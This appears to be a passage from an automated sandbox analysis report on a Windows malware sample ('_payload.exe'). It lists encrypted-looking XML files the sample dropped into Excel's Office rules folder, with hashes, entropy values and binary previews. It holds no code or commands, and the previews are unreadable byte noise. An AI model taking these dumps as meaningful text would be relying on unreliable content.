                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11768v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2487
                                                                                                      Entropy (8bit):7.912285144962841
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:MyPnoTDXIYHPpbgSxLFMgH+Au6pouFcoCB/TNyCkWWHaOfftYCwD:TSRhLFMgeAu+op/TTkF6GWH
                                                                                                      MD5:3D5D93A1BFF90E95C513E5B1A4FD52C3
                                                                                                      SHA1:F1E2CB16C6E6490EE39CD1734366D68D7046950F
                                                                                                      SHA-256:125F4E437DE22679CC71D9C59A59E0B7AAC97F07EF60CFD7492F3526A356A141
                                                                                                      SHA-512:DB56BAF72F8FFC8451585C4997E03E12D8DA0D63914F2570CADAAF3390043B4730C72ECE2D8B6380EDC8B793EDAF806AA4B74CB3479931E758911D716E3BE084
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlc.?.p.D..i.E...^........PX.s....~.P...RQ..[.2.2#.y....z...uo^5.....A.D.24.........9.Dd....B..I!..s...b.8...p653..L.n..Y4..M.....j.o3 G70.,...<3.5.$......vF.._...<.#;~.B+.|....jCD.WiT.q.-..$v.Q..b.....&...#.O....~A&.Q|=.|......|^..SF....2.B.y<|;.i...D[...?...&..V.<!..~..y=...Z(-m..9`.^..4M.....,>6.L.b.....,......r..6..1O.!.)..|...'......R.y0.(...'!......P%...o....Q...V.>!....-R.`2.........8j.}N5r5l"..C....h.F....0\....4.q..:li}T.f.. ..........f.....!...=..?...:X.X..{.$...6.f.%H..2294..e..y.w....;.1-.....U.....~.@...'n.j..h...6....5e?1.....B/.[z.v.....A....d...94.t}p.~.......p1.F.b.>.7...[..qU.a\m....6h..R..1...t.....lJ_W..G.tg$.].A.k.E>.0S.l.c.=..y...rB.8.d.....!$.(..2^....]#k...V....6.c..G....58|.h.V...%.<GQ.{3..4.tL)..P.R...E&...j@....FE.....3'..7{.bR......L_1...eJ..?h.d...[....th..]...b`}.....uwo...(..Z...z1.X,....I.........vz.......|b........."..s..KX0..4l..,].`.bY.....={z..L."....y...pR... ...w..*.EK#n/,..y.....;t..qX...DN..fF.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11769v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3132
                                                                                                      Entropy (8bit):7.937463639500599
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:2vPPj8CCdqbvTrjSy07yLAmJaaFHw4+pyKYr9:+j8CCOay07TmJb
                                                                                                      MD5:6E934AC0E98B7BCEE0A3B92DC89B62A5
                                                                                                      SHA1:43930903DEEED8BF4AD0CDF8F8E0EB494A868847
                                                                                                      SHA-256:9F180EBFA341E4C26684C6CC0B1E6BEE6D977793F423FD1C7636BA3F7CFF14FC
                                                                                                      SHA-512:EE22575B3085EA69E391EAE42997744B86556F7CC91B38BC9F3DD60B2EAB316756D55282C892083648ED2B6C01B05B55C18141E9AD5DC6037DF3D31C63674353
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.T'..~.?...PlT...:..I...`.PD_...._.:S...\.z&'8.R...F...l4.:N...,..SL:....o.u8..x.....9..^(.).......W..MY..W..t...%.u..5E.+%d....j....|.......>.0.f4C...6....&.}6..$..i..Q...\..Q.."R....U..?....).v..*RBn .VaZ..F...rR...aS..Y."p...r..n.\,z.....+..:.....#<u...k./C.3.8...pI...O.n....L.x.E.e.(9...i.h.R...R...A7..o..J.\r.h....sfo....@....K..Z..B.".!...m..(.>v4..0v-.6>..qu$...+.....=r..=.F.....B......bs...|...vj.....G..l..w.v.aB..<;...'}.. .I.r....~......>.`.%...o.X.#d..E.oL.x._...6.....$.Dn... /F.K!ap.l.#R+l..v".5&...VG..l.......g...R......%....E.+..-..A...:....._._..K..>.C.$......BR.&..Y'.g.3v.A[..)B..C....d(..R7.c.!.....5........[.7.3..A}^..x[Q.bl...jls._$.x.p.n......&.....k.B....T..L.Q....Y. ...t>.9.>1......2Sj..4...~.....j..Xp.].;-.2I....c~-'P..i!...f.q.FJ.. .,+>/..i...U?.\...\.c.F....1."..']yp.{W...G.....K..G.........`...X.....2.o.p5.D3.E..u.1..w.,..y..........l..o....2..vq.....+.7J.C..../..x...p....Js[.I.....f.A....`...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11770v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4968
                                                                                                      Entropy (8bit):7.96406448882393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:7fvG8/XGw1W3RCYc2KfUSw8wuMJcwJFPWOEF6q6:7GoORCYIUSnMh0/r6
                                                                                                      MD5:9B60C77551A23E0A82D3043BB2EC06D6
                                                                                                      SHA1:72C508AE05DEA468AADB63FAE8E973B605DAE04B
                                                                                                      SHA-256:C3490BA023254254F0AC218846F9F9F7D3BE8DCC3B69426122CD454703FADDF3
                                                                                                      SHA-512:E0FD8C4E678E0843662C2F9922F32A7BD0DE0143CD4B02F8C354EB155558BE2F00363A675ECBDF5ED88890E6D0F799C2E3A3C82CA634C3E43BB79F98E8F3D11E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlo..xtI.....;o.@.b(..........Y.p....sj..HT..."w_.S.f...x_q..$...4..P..._iT..ls..E@..Aj..M.%q......:....%i.B.......1.....6.B...........V}..`.......^.h.-.0<Q..F.U...i.K.....<Z..A./s.J.9@.[.....@..9.{..6.3P...&V.....$..t.)....X.V....%1U.Gw.5.7...8'.>.+.....\|jD....1..P..I...|o.>.....n..g.C.m......O.%]...$~..9..@`....Sq*.v/,D....c..H.8R....?.v....to...N.......g+/.Y..>..|2.a[..8+..TC.h.a..F....+.!.5....N..&f.<#e..\.iaf..+.h]..k..T.......u..<,.Y....{5._....H...q.u\.....II...].=M.m.........:&.Y=. .....s.6x........9s..bq..'dR...h....B..Me.....X.j.H=.M..l.....N..7.V....9...0Q.P'..tJ..>X..(......-.."......j.......!......KO.f.PG.8..f.)....bD.........J...A.96..< c.th.Y5\99..).(....~.b.D.&..~...H.V..}.8..1.&.........My.Q.q.....s..T0'..T....%.%.j.M.iBi.8.F...n..>_.3..`..Yq..1.p...I.Z../I.L=..B<0..&....H...K...7....*.7ihZ..!.NW"./......2..(..!cF........Z._.}.9.?@..Dy.l..{bp.,....).CUO....?..;z(}..z.g'...i....q......1..M.I..W.5.TS..L...........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11771v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7596
                                                                                                      Entropy (8bit):7.974471425255897
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:xRHrBHKM617LS44zXX+a22b7VE5HTO30isuCO/u:x5lGxm42X+27jst
                                                                                                      MD5:D3F9D21F0AB5BD06151D1AC9B928C7F8
                                                                                                      SHA1:287C55DC23CC2F62FDD5A166BFCC18C046424917
                                                                                                      SHA-256:476C1D5D26CEBC8643E5EDF8D12EF226824E2BC2B40752E03CA4B6915E295AE9
                                                                                                      SHA-512:581E04A607859952B6FFC27B813B161473BD5E0303BEDF747767B39933B4F2C18DAFF1D94355AE41BE009B5C66041EA4666011BE52B456E4B750835E1171217E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..(|.i.62I..e..p.a8.....=..z%.U.. .....#.O.....GS...8..\b.L...X........@....Z..i.t..w..&....0.....P..o0_......ep.A...gc.m..|I].W>.A.J..E..*|b.9<.|H..]pB.k.W#..U.....\..9nv#d.{.(.s....wt.5{.k.X.p.C..EPK.i;l3".K..B..6...&.y2..Kd4DN[.,Bn .5.o..B..RS\.n_%...W.@.}h.\H;..c1.....o......tHm3kA.T..Z.k7..].....X~.w.<.m.qo&w._a.w..&/...G......+....m<.....>".1qi...R...&h|..............I......Y..A..4.:.D).-?.O....y......A{X.8{t..K.'..f...u.s...#...}X..a..[....". ..7...MO%"..`x8........q....L.....5.V...G.......=..A..o=.q..=..}*5Ol...G...........c...q..^.Z.._p:H..{L.Y..h.g.NE5.S....&.........n7d'..>..-.V"...#2.js/R.z..o}..O....)....l...D.....A8.b..`......u>..T.P...{p....u.(..TM....D............'sW..,x.b........6#}.Gy+c....*....:9.#.y.._.Y..-_.d.V.3(f.D....x.,.>.......0fO......Ifn.vz>.:..I..@O.(.l.Vl...I.....2.$....<b.v..O.r8.^.-hA.*.NG..i)..t..L.....m._..T>...9...~....a.'.$a.........qa...m.......O....rDUv(.?.4..=.......rc.x.E....4/...Qg...')...31.S.. .b

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11792v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7356
                                                                                                      Entropy (8bit):7.974575206649072
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:5cYInrhvShb5a1jz8ounryuR1flDVkN1j:qYInrhqhb+z8BrtR13a1j
                                                                                                      MD5:4E679D58E1278F87F7119AF0BD3CA5FB
                                                                                                      SHA1:F202DCDFF8E3E1C7BC7F2D814AEDD11B1969C544
                                                                                                      SHA-256:635515A2B1CD280D1447A300FECD0D6B5174FCB8AB3057B491571D5F1768E239
                                                                                                      SHA-512:634D28768E15743685FD828BD57852937E7B3F5A4DCADBC527CD05275399A6BB975F2915E8BC3CC2B30A14728879071A639BEE7F2C18E9506724617974C386CF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..j..s2...OT{.........8...i....il.f].EW...!`..b9..a..-.Xt.y.....1..^D.U.kP..{c..~.x......;..y..*f.c...G)..|v.l...m..)...M|.:.z...<.G.X'.ss...4.`...W1.Ji..$w.*1A....:;.L....i.....M e`..F.......~P..2.b.....$k..n.9.hP..sN.....Y..}.b. k(..L.....G.T*=.=._..t-..y..%...ki1.3cJ..4...S..{.W..3....R..8....I`..g;U..u.....Xs..L...'..n.^.$..!.......1s..m%....#......x="Ya....h..l%v....`p..\.S....n.<..\F.2...........Q.....<c.J....~|'b.R.....o..d.....f..V.>.N...."..v`.W......Pz...[.o..{.&.BG..Q.....1fs<.z$I...+(c....{.\.P..,.W......Y.{..)......DD....f.....!,..M..!2\.5.5.8.m..2.C...\b.............../PC.....P.v...&._......(..?O.0*:..E....=.\=....Zi"-..^....z..X.....8..f.B....t..._s...5)m. K.:..!.}>n.yp>.^....hu...F.......p5..2.e{l.h.^..@.!\....iN.Z..|.$L2>...>.i...@Z...p..........2.$...CU.T.t.x.7.S ./!.kb.&...w..k>BJ.....Nz..*.%.V........n..O.......Q...tGl}.~R(.y.pX.\t..5 ......K....4c:P..Zs8..P."*....{M(Ubw.1.7....-.q..]..B.L..xRl..G)..ef

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11793v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1551
                                                                                                      Entropy (8bit):7.882235554849409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:KzzUQMUa9qX8i6gz3xc6ZDilOnyImt7qVaqVNnFLLJ+8ypDXfNtQcdqv6bD:Ka9qX8iPNIf74aaNFLLMDdqwD
                                                                                                      MD5:6B2802DB293B06E2D5367A01B877C99C
                                                                                                      SHA1:577E8DC7638A4752480AFAF2EC81D5C1C1E1818A
                                                                                                      SHA-256:5C8D804CF1B346F993FAC5C92739BFEE7C9BE1225EACE98A95B1CA44CF30AB78
                                                                                                      SHA-512:A8AD4FCFF8FF0692C9B37E9C7F4692A953403D40A193DF3C40859BFC9D9A772DB7BFEB4A0A9C764C8548B90345DEC5CFF7DAF2D097016CF208BC6ADC6535AB37
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.db../.eL.B.h...Wp.p.....C-....H.*......Ha'jI._".T[..3.I..g..C/.....o...~..?..!../....g...5.|.r..KV....Y....H...u......n.o..U..c.w....=.6..mg....E..h...#....A..g..../8..]..?....p.z.j.f@..T.H?.K.ms&.."..xX.n<.S......G..R}b..v.R....m...,..N.cE..........]#...8.*..c....Q0..i.h.....z^Q.3.p.u)..1 .....m...3......F.....&......._.\.......r..$.........u.... >.\..R.^.i.*O....ek.<([CZW.0....5...~.C.I*4..X.;...X..G...Xn.. ...`.... ..I.U.....k-...pr".N._Z.hqTA.|....:.y)E30?.-:...s.CB...].].g.1.5S..Z;[. ......%..>.}N...vO!..;%.D....u..G.9n4.$....Mku..g....+.Z.w...0ZQ^..."X.:..0...p.qB.a.8....q..v...,.s.f....P.+&.........|..x.N<h.D.. .z.i>......*..D......o.x.e.#{..E.....P...*.Eh../...a$H.?+...H...@..#Z..1.3Q.<r+.N..$.7..>........2\.2.DL...)%..'...VK..........^r.xQ........+.. ...u.......d.%............oS......6...?z.Xa.3h..........3Z.Vp..G....r......Q....N...i.:5.CKx..\..?..t..../....)..............m......x..Y.t......#T..t.. .I.I\.v..PG....0.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11794v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.85114494908577
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:vuSzAntTBNLXSfh0J1VLj3ZoGOtO9M/dPdRNwD:vuSzslNLifh0VP3ZoGXM/JdR+
                                                                                                      MD5:7BC6882EC2A8002723D070D1C20EF9AA
                                                                                                      SHA1:1F704DA90A151FB72E3D9FB25C04BD1B8A98DF4C
                                                                                                      SHA-256:6E6DFEDD71513F6633B93A1E9C97AA5A16022F6C397178ACC18B4ED42315AA0A
                                                                                                      SHA-512:27C4085B82B8F085FC4C3B02A578B693D30B90485988E68EC72B4583B52E46A5B9AF82B3D988107814B2427E45D3340F2A937362A800F45E365FBF1A24E00230
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......5.,t....&X..^.....!..0.....xy.....{...GW@'I.>.v..A..R.~..,y.".tYY.2..P6k.oY&.}.J..f.zM.WZ./..*.....d........Zt8......Lm~. ......x#.?.......c../.L3Z.o..).~.e.f.~l./W.).[......_.sF..[@je.[...mj...i.0..<.`.%7/......N..S.J.....M.O..&b.......'...[.....U.l.<.J-.............v...}d.8.X(.E....7....bv.....3......av-./.&..k.....~.0M..Nf... Qf.Dt.E.=.PJ.U.L.B.`..*}..5..=....Ca...:^...:d4m.L}KA..Mg.x..l.F....v.b.....PFnH39.(..a..?.W.9...h.@%U0(.X.v=.-.<........iY.nr.An.l'.1.9..k.a..7.q.....p..20".*!..~..$..q.....,.........h.3.6zQ...r..z.....).@...?.2.........G...''.......@&B9.'.4.V....Z..w*...u....U.~{o....P...=...a...1.F.....M..e._..../...q.8.18..]B.I...3~..6.e.....)|.4.I)...,...q.._]...8..\.. .3.f.l...wF. y.cU)....H`..Y,......m.P.....nT......%..f'..q....J..5_1...d...?..@..6.C.0..E...vE.P@.B..>{TA[.$...o...WG...)."...90F.86a5{.8..H...&y...yG}.i.....icW.....bY...Z..1...uy...@.A.....`..kR....?.D......8.....ZF.a...y..&d......j+..g})..`....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11834v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.90074089717686
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NAleQf1B5yiaKEcxuej9C70UPnxg9QbpwD:NAVnut708nxg62
                                                                                                      MD5:44380C8769B7E19706313C19D56D9007
                                                                                                      SHA1:4568D279017DA26501BF18673E8F63220A5B5C78
                                                                                                      SHA-256:B0CA877B9B27689EB917B4D60A320A6DBD7BCA40CE713C9C0888B85D7A0B056E
                                                                                                      SHA-512:1FD78DCBB13863F78B8EF1FDDD615F33913EF6B71D075DD89C257942C501AEFD725BF7DA41F41BDCF4778BE2610D02E1D964A0EFED80DF1149996BDE1E19884E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..j..]..p....PC=j.?.m..K.m..C.v2.Boj..L_..*...p......g0....*......t..qu..../......5hu..O.p..f..0..._1.......>.;....9=..;"F..B.a.g...+.....}...(..~.GzZ`./}.aPV..i......3...XQ.o...&.8Y................9u.[...... .b...$S.)1M..<..i..W*Q...."...X.3U`:K..p..'cKK.+....k.X.X.'t.7...l[.q.W.q..)m.:......H.sa~..,.1rK...#....S.TR..;.f.I9..BG_Sd8t..:6-..O.(a~|...rF....J1.r._;....h0-...&d.>g...?t.h...%..F.............7^......0.. ....S..... ]\..?....F.=0...R..]..5.$.M...AU....\.!.@.Z./`...f..cM%.+.Ro......"..{. h}.K...4...I.....X.U......t....*...lu..,z.z,.;6ZB..z..~...l.+.5W...a..8..y..B..k.../.@.............'......P...D..$.{w.Ck..g...l...a>.:l...&..A.Tp..v.F....n..i'.h........p..'Wd....3.j..bl,.@r.2`.GM;P.><m:.4.v...3.....l.F.`Y.|.....%O'.....L.......H....7..x0...R).8.z...zSJ%..t.V.E..........7.....".Bf.hI@...$`._.e.a.....<*...i.V..a".x3....9x....oZD..K..C.......=....h.. ._d`..~......s' .nRK#....O.w.......6...^..=.m...].\...+.?.'..L..vo..a.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11882v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1448
                                                                                                      Entropy (8bit):7.877668610685388
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:l6Imc08RJDTbPsB1rjRIBR5Gh7PIsQgWIslalzpxuBMGDyuSEE19fr0nlWv6bD:0QTIBXIbw7hpJ7uBBDyuSE+oWwD
                                                                                                      MD5:C2AECA134FBAC7B0B5D77F1AF9FE3A37
                                                                                                      SHA1:0E69F04B4EC4236B149F793119560F0B8D08B171
                                                                                                      SHA-256:99906B85D40594D01566E725619F57E919BD92A6C4C756D95E489F220FD74670
                                                                                                      SHA-512:19AB82BA8C9B71B3BAF3CCD9B2AD28EF030BDE380AD4D28F9879426494802ABCBB9C1BE6ABE7657346260B7A72322AA05CB3814ABF0303AFA34097D6CDCF52B6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..z.@R......A..........].....>_....Ka.4..$.1..XZ.p].gQd.....T..@....j$.3[....u.>k....By.........l.Ox..GT..|.s...#j..........d<...n~.4@Y..P;...,......)$P.."0..0...h....!....>B,..1..$...]_..J.D.e({q.1....~...-....X.y..#Ur-~2m..+........:Z....(.hm%.q....$B.U....r...:....p...N...x....aXO..%d..e.[.....gB../.....-vg.>*..M..eR?s.0{}(.)..\.M...*8.......~iY.|X1.*.ar2G..b.~S.=..)....s`S...7..~..Y.W..".!.N.8}. .3.G.J,.............zL..._._...d-.P...k?..j.;....GS_L..2;i..$..RH]..w.7k..o.......L ..D...6..P_.J.!.>....fQb...@.......B..!r.e.9.....NwF.K1...k.R.nR..bg3...m.FT...).,Z....M.:..?y......kgx).Z#.$....n...;.pH}K...+.......B..c.Q'.,Gm.E..{!@..N.5:..Ep.MR9...*...3.._g..W...._.....y...X.X.t......E...v.].3.z*.s..4<.2....R>..;..s.....T?.........Y5...3?/.\..>...i.....(..E.p..,..Y.3.C7.....mp..k....@.'..p.J.....v...[.....<....)...",6.^.J..n.q...sa.l..Y....j.....]#...wttsw.#......$...b<c>...(...:...Gh.A~...p....Q...*.....&.R.a.Hg.m..|.:..y|.*.{H.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11890v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1419
                                                                                                      Entropy (8bit):7.857885692832258
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QDegaE0Py7DRkd40GemwraCrQJ9LBEVd+u6RDTVwT64yw2rnv6bD:QDeFE0PyHCHGeW91EVd7QDTo8nwD
                                                                                                      MD5:A0BEF40D6214A0F0E4C914A44EE33208
                                                                                                      SHA1:101F6A109DC749A7E7B8790F0592179EF26C5A85
                                                                                                      SHA-256:B08AD053E6D2459B8E1F4F952F8317D1B3A480930DE6C337CD3018771F1AF693
                                                                                                      SHA-512:7E22FF249C88DF5A7E22BB576ACC6AC0717B11413C65272C6177E288066E054A8E23DB3ED2A8E6874559DC5120F988E9159FBE451FB1804722C48E889CD7A93E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.W...o...;r..t$MFi.. ... 7Vvd.v.dzE..<.3H....I.r9LEX.....u.Xu..C&:.Q=....S.....b..3.....w.y.P".=.<.K..s.W:YS.4..3.8.4..(.4...U.w....Hm.Pd..D...s.3...{p....H.._,....u......|...<8.c`.h`.....B..4............(..f.h.s...B.6<,X..lxE..c...^...+....a.....~P...v..;....e.._Hx...f+.gDR.S.w....4.*..m....{....kww:.<1...].....o.H.0.[Y.Wi'R....A...>.U./9..o...(-OB..k.t2...8d..;X.ks......#y.|.2.`.>5g........RE..g"....N.P.&T^...b.<>&...\..U.i..gbH.".....k(.K..%j..S ..c....I.>.0.}.....KU.g."......"OP.&n.a.e....L..T3~.......\.<...u_....t'..Y.V....0^.Ia..........h..m/..|....>[.i].Z.....fs..(.N.....RX..o...U.....y...T.6.yY.....6/..2`.8....6..cm....d.[.,..&.....o....9..}]./......b..;.5.,....y...\$i.;.k*.#.o ..Z.[erW7...r_...?.p...S.IC.?U....@....Ix.6A"l....Wo.h.A).,.....A.....k.&;H.L.. ..P..*......{=|..f^..{.......J.a[b...8.......W..<.u..n....BW1.....w....Rfz.k......&i6....9..o....f..tp....C.....T...6gJ.>.x.`E=.....{.+..J.I.9.!....0.s..hE..O_"..s....%.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11930v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1546
                                                                                                      Entropy (8bit):7.858694563375653
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3SYQDYJk3oLRqCqlhdHunuy70Ml71TbZHTB3I42HNr1aks0IZ8Bv2Twx2Q9pxedi:IYJk+dkouo1tBb33IjtgTE2Q7xedvpwD
                                                                                                      MD5:F4C7649BB5C8B7A14B19D3AE97B432A7
                                                                                                      SHA1:50F9EAD4CF5718A7F7CE89C928B51D507D301775
                                                                                                      SHA-256:CD288D23E077840CCFE2543A61E726385C7AEE78BB2EE8EBE6FD964F4DD6F240
                                                                                                      SHA-512:572ADF63FA68A68031A18A5420D9500ED7957E3AF7DB0095B657263B44CCD38992FE3A3FE2705595B51C56088D162184487B2BEFB1E10CF917B7F48218D17F30
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..._:5;T..U...W..Q0...-...]Y.{:M...n.."..:... ..j...F^B"y...8.l.q\..|Th.y.T3V.I.......B. ..v1....9N..........,!....x.U.....d.u...K.....\}..zn....+..!hf.W.....d..@W2x.........F2...Zf.Q....".a.:...'...Iw.B. .t0.s..J..5g......>"..iX..V.T.7P......=.....od.<...J.......@......6....?....ED.._.g.d...]./x,jx__..]0..u...n.aW|.Ng..m....{..dFa..]Dh.g.u&.4..P.....~@...@...A.8.H.....\..G`.I....|...5..mp.Z.@m............U./".-......\......l"..QQ..#.J].....o.|.S.n=.....^...#5...P.(....%.Av...._..h_`...).!.k.m.}.Hy..G.5$.i.5q]fc..{.....*.n....>..+'..../k.K..'...P.V....DX.|J.../.4..dN{.~1..e..f......X2...6...hj....i1X*.z"...#.....%......Fh.9.H5+....ST...*..z..~.........o.X..M...k.{.!...L.q.bnN.Y!..W.6h..5.V..L%..4k'$.....9.e"...&.f...8wU.5..V.C..C\#../...(.~.......[7..g......./..y..O._..m3.p.......|..2....n....:.>..i..a.#.Q.m.m.&p........&*..bGy..8......M...L..........)c.......v..m.N'.....32#y..U.W.4.Nj...d6...h$..#........yn..T.4?.l..<.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11931v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):903
                                                                                                      Entropy (8bit):7.734567144799312
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Wiczwo7dXOnbKJbkO8Dl04fB0vm7HaDAotOJe6HpJNQVQZ0MnqtXxehyIRHg7v6X:fIF0bsz2lbZ/lo0r5fUh1kH0v6bD
                                                                                                      MD5:E1C0B3818183BC482836E326419C7B80
                                                                                                      SHA1:0F9E76F53089F53ACDF245ED12D12C6A24F97C6E
                                                                                                      SHA-256:F4B5C25D0C9721E9A2DA8BF1CFAAC430F8DE6C9203B8A4474502F7DB0176A943
                                                                                                      SHA-512:F20F822361631A95B3E1FB64EC8F82006393D6B3BC8216AC90152950DE1D1CFFB2C77A0E3117EA8CDF5B35E3AEF841C64DA6042407F9D0EAF9BE68CAF4F3AB6C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml<&Q.G.#...:.."s1....2[../<..3.v.).o.*.`{{..O..T.n.K.TE.a ....o!B=....A.J_..8..... ..P........a2....D[.)O4)....9n.^.......a........2F18..#.........`t.].L1up.b.O..e'...i.......Q......M.RJ."........s.`.k10=.>7?...../..M2...-0..c/P^..Z..\.9$.a.:.;-..plj<..2s..0.U....V)S..up1.\..c.Y.h5S..V<Z;..cP..?..h..F4..c*R). 'W.|....N...H.7JvO*...6o.|O..j..?.8.D9..uL....#iU...Q[{2.$1/N#...K.j.'..h....S.)\.3U.1l...q..Y.9v.zz@.lJ...+$J.u.......1N.\j..E...3......l&./..e.....:l.&Y..36*e.q......T,*:2I..M.N..Q...%.K..t...Zv.e.@h.".k...p0....@ ..B...:r...e..#.Nr..@.o\.|.1..D.....L.....8AV......!.N....r.b....~..dE.,.7db...>.d...d.....s.......!...H.5F..E.. ..k.E.!....I....H.ON. .p...i..R_.O..9{.1o\.Ja..V .Z...X.....g..y.~.id..D...^..P2'}.uZd..\o..=...O..8].(...S.a.....(oW....r5...#....XhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11932v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3566
                                                                                                      Entropy (8bit):7.94968943127139
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:ECad8NmiUC+xCXUMPEEGCI5VV0oP9/xafcXDoK:ECNA5CgKUitGp5Uk9/xsIDoK
                                                                                                      MD5:2E1CCA00383A840AC99C93CD43EF6398
                                                                                                      SHA1:54519B819943A66DDB10AD0E0F68AEB9A9BC2300
                                                                                                      SHA-256:CB2B7B1428FF01AF6FEAE30871B8241F61B22933C21458327DDE9495CCD0E045
                                                                                                      SHA-512:C1315EE924070EB26C10091DAD12AF8C1C8691F5FC240166B31995B417CADB1C8E2E3C8C8ED0E7BE77C22F1C06E47A50A7D035E3C74D539CBEA038334B1A8DFA
                                                                                                      Malicious:false
